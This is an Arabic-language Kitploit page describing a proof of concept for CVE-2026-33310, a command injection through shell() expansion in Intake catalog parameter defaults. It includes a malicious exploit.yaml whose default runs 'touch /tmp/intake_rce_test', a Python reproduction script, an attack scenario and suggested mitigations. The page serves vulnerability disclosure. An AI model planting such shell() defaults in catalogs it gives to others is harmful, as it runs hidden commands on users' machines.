Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/redyank/cve-2026-33310
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالأمن الويبالقيادة والسيطرة
GitHubredyank/cve-2026-33310

CVE-2026-33310

إثبات مفهوم يوضح حقن الأوامر عبر توسيع `shell()` في القيم الافتراضية للمعلمات في كتالوجات Intake، مع ملف YAML للاستغلال وسكربت إعادة إنتاج.

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-33310

CVE-2026-33310 (حقن أوامر عبر توسيع shell() في القيم الافتراضية للمعلمات)

ملخص

يبدو أن صيغة shell() داخل القيم الافتراضية للمعلمات يتم توسيعها تلقائيًا أثناء عملية تحليل الكتالوج. إذا كان الكتالوج يحتوي على قيمة افتراضية لمعلمة مثل shell()، فقد يتم تنفيذ الأمر عند الوصول إلى مصدر الكتالوج. هذا يعني أنه إذا قام مستخدم بتحميل ملف YAML كتالوج خبيث، فقد يتم تنفيذ أوامر مدمجة على النظام المضيف. يمكن تصنيف هذا السلوك على أنه CWE-78: حقن أوامر نظام التشغيل / توسيع شل غير آمن.

التفاصيل

يبدو أن المشكلة تنبع من كيفية توسيع القيم الافتراضية للمعلمات عند الوصول إلى مصدر الكتالوج.

أثناء تحميل الكتالوج والوصول إلى المصدر:

يقوم Intake بحل القيم الافتراضية للمعلمات تقوم الوظيفة المسؤولة عن توسيع القيم الافتراضية بمعالجة صيغة shell() يؤدي تعبير shell إلى تشغيل عملية فرعية نظرًا لأن هذا يحدث أثناء تقييم الكتالوج، فقد يتم تنفيذ الأمر قبل أن يتفاعل المستخدم صراحةً مع مجموعة البيانات نفسها.

يبدو أن المنطق المتأثر يتضمن:

root@kitploit:~
expand_defaults()

والآليات ذات الصلة بتحليل المعلمات.

إثبات المفهوم (PoC)

exploit.yaml

root@kitploit:~
metadata:
  version: 1
sources:
  rce_test:
    driver: csv
    description: "اختبار توسيع shell في المعلمات"
    args:
      urlpath: "{{ cmd_exec }}"
    parameters:
      cmd_exec:
        display_name: "معلمة اختبار"
        type: str
        default: "shell(touch /tmp/intake_rce_test)"

reproduce.py

root@kitploit:~
import intake
import os

PROOF_FILE = "/tmp/intake_rce_test"

if os.path.exists(PROOF_FILE):
    os.remove(PROOF_FILE)

print(f"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}")

try:
    cat = intake.open_catalog("exploit.yaml")

    print("Accessing source...")
    _ = cat["rce_test"]

except Exception as e:
    print(f" Error during execution: {e}")

if os.path.exists(PROOF_FILE):
    print(f" Command execution confirmed, Found: {PROOF_FILE}")
else:
    print("Command execution did not occur.")

سيناريو الهجوم

يمكن أن يكون سيناريو الهجوم المحتمل كما يلي:

  1. ينشر المهاجم ملف كتالوج Intake YAML خبيث
  2. يقوم الضحية بتنزيل أو تحميل الكتالوج
  3. يصل الضحية إلى إدخال مصدر في الكتالوج
  4. يتم توسيع القيم الافتراضية للمعلمات
  5. يؤدي تعبير shell() إلى تشغيل الأمر المدمج

التأثير

إذا تم تأكيد أن هذا السلوك غير مقصود، يمكن للمهاجم توزيع ملف كتالوج خبيث عبر:

  • مستودعات Git
  • مجموعات البيانات المشتركة
  • عناوين URL
  • سير عمل علوم البيانات
  • أي مستخدم يقوم بتحميل الكتالوج قد ينفذ أوامر دون علمه بصلاحيات المستخدم المحلي الخاصة به.

التوصية

يمكن أن تشمل التخفيفات المحتملة:

  • تعطيل توسيع shell() افتراضيًا
  • طلب علامة اشتراك صريحة (مثل allow_shell=True)
  • تقييد تنفيذ shell للكتالوجات المحملة من مصادر غير موثوقة يرجى إعلامي إذا كانت هناك حاجة إلى معلومات إضافية أو اختبارات. يسعدني المساعدة في مزيد من التحليل أو التحقق.
تنزيل الأداة